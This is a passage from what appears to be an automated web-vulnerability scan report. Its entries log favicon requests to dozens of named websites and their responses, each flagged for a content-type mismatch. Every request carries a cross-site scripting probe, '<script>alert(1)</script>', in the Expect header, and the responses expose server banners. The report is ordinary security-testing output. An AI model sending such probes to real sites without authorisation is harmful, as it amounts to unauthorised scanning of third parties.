GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cherokee.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:54:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.55. http://www.chooseyou.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chooseyou.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chooseyou.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:07:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.56. http://www.churchs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.churchs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.churchs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.57. http://www.cityofmadison.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cityofmadison.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cityofmadison.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Connection: Keep-Alive
Content-Length: 60
Date: Wed, 04 May 2011 02:08:18 GMT
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET

The page cannot be displayed because the expectation failed.

31.58. http://www.cnmnewsnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cnmnewsnetwork.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cnmnewsnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:53:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.59. http://www.colemanequip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.colemanequip.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colemanequip.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:52:35 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.60. http://www.comforthouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comforthouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comforthouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:45:50 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.61. http://www.commtrans.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.commtrans.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.commtrans.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 02:02:52 GMT
Content-Length: 60
Set-Cookie: Coyote-2-c0a86363=c0a8630c:0; path=/

The page cannot be displayed because the expectation failed.

31.62. http://www.concursolutions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.concursolutions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.concursolutions.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Webserver: usseatuicte48
Date: Wed, 04 May 2011 02:57:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.63. http://www.connectingsingles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.connectingsingles.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.connectingsingles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="ALL DSP COR NID CURa ADMi OUR STP ONL UNI COM DEM"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:25:51 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.64. http://www.corvetteguys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.corvetteguys.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.corvetteguys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:33:54 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.65. http://www.cosplaymagic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cosplaymagic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cosplaymagic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:25:46 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.66. http://www.craigslist.at/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.craigslist.at
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.at
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 23 Jun 2008 23:06:11 GMT
Cache-Control: public, max-age=315360000
Accept-Ranges: bytes
Date: Mon, 02 May 2011 22:11:07 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain
Server: Apache
Expires: Thu, 29 Apr 2021 22:11:07 GMT

............ .h.......(....... ..... ...........................................]2..]...]...]...]...]...]...]2..........................]
..]...]...]...]...]...]...]...]...]...]...]
..............]
..
...[SNIP]...

31.67. http://www.creationsrewards.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.creationsrewards.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.creationsrewards.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 22
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:45:40 GMT

<h1>404 File Not Found

31.68. http://www.cruiseone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cruiseone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cruiseone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 00:53:40 GMT
Content-Length: 18
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSRCCSC=OAEBMKIBCDLCKEPAHOFMFECC; path=/
Cache-control: private

404 File Not Found

31.69. http://www.csi.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.csi.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csi.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.70. http://www.curtmfg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.curtmfg.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curtmfg.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 02:30:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.71. http://www.depositaccounts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.depositaccounts.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.depositaccounts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:23:52 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.72. http://www.diesel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.diesel.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diesel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 19 Jan 2010 16:54:35 GMT
ETag: "3fa1bcc-1636-531848c0"
Accept-Ranges: bytes
Content-Length: 5686
Content-Type: text/plain
Date: Wed, 04 May 2011 03:47:31 GMT
Connection: close

..............h...&... .... .........(....... ...............................$...(...-...E#..F#..H%..H&..I'..X8..[<..hN..mR..~f..f...l...p...s...x....................................................
...[SNIP]...

31.73. http://www.discountfilterstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.discountfilterstore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.discountfilterstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:55:51 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.74. http://www.dishant.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dishant.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dishant.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:17:42 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.75. http://www.easy-poll.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.easy-poll.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easy-poll.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:45:04 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.76. http://www.easyipodtransfer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.easyipodtransfer.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easyipodtransfer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:36:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.77. http://www.eautorepair.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eautorepair.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eautorepair.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:44:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.78. http://www.efoodsdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.efoodsdirect.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.efoodsdirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:48:09 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.79. http://www.eforcity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eforcity.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eforcity.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:22:25 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.80. http://www.eftours.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eftours.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eftours.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:49:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.81. http://www.elitemeet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.elitemeet.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elitemeet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:21:41 GMT
Server: LiteSpeed
Connection: close
Content-Type: text/html
Content-Length: 613
Vary: User-Agent

Page Not Found
<!--

...[SNIP]...

31.82. http://www.endeavorsuite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.endeavorsuite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.endeavorsuite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 04 May 2011 04:11:59 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

31.83. http://www.esa.int/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.esa.int
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.esa.int
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:41 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n18 ( iad-agg-n34), ht iad-agg-n34.panthercdn.com
ETag: "f9b20-13e-3ee0a9b41db00"
Cache-Control: max-age=116961
Expires: Wed, 04 May 2011 12:25:10 GMT
Age: 85492
Content-Length: 318
Content-Type: text/plain
Last-Modified: Wed, 19 Jan 2005 17:04:12 GMT
Connection: keep-alive

..............(.......(....... ....................................tc.}\K...t.....nM<...........................................................@2#.....5UR0H..CUU8@....UQ.%P..22S.....!.P....."2P.S...5
...[SNIP]...

31.84. http://www.expertclick.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.expertclick.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertclick.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:34:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.85. http://www.extrememotorsales.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.extrememotorsales.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extrememotorsales.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:51:29 GMT
Server: Apache
Content-Length: 20
Content-Type: text/html; charset=iso-8859-1

Expect not supported

31.86. http://www.extremeskins.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.extremeskins.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extremeskins.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:39:50 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Thu, 17 Mar 2011 02:24:10 GMT
ETag: "6a880d7-37e-49ea45b464680"
Accept-Ranges: bytes
Content-Length: 894

..............h.......(....... .....................................".1..........?V.m..~.    v..Wl.......................%... Lc..4..w........X......w...............    .).d.".......................P.....
...[SNIP]...

31.87. http://www.farmcollector.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.farmcollector.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.farmcollector.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:38:26 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.88. http://www.filmsandtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.filmsandtv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.filmsandtv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:04:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.89. http://www.findaproperty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.findaproperty.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findaproperty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:15:11 GMT
Content-Length: 60
Set-Cookie: TDPG=l2dvKdd/8nuRw1kmmbv8FBvoOLWMKrYq5v4l3M0fq8hmZQaE/7RbYSMr9UID93B4z/+vKK5dvcmUpds=; path=/

The page cannot be displayed because the expectation failed.

31.90. http://www.flychina.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flychina.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flychina.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:02:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.91. http://www.freemdeicalin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freemdeicalin.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freemdeicalin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 01:51:42 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

31.92. http://www.fridgefilters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fridgefilters.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fridgefilters.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:20:36 GMT
Cache-Control: private
Connection: close
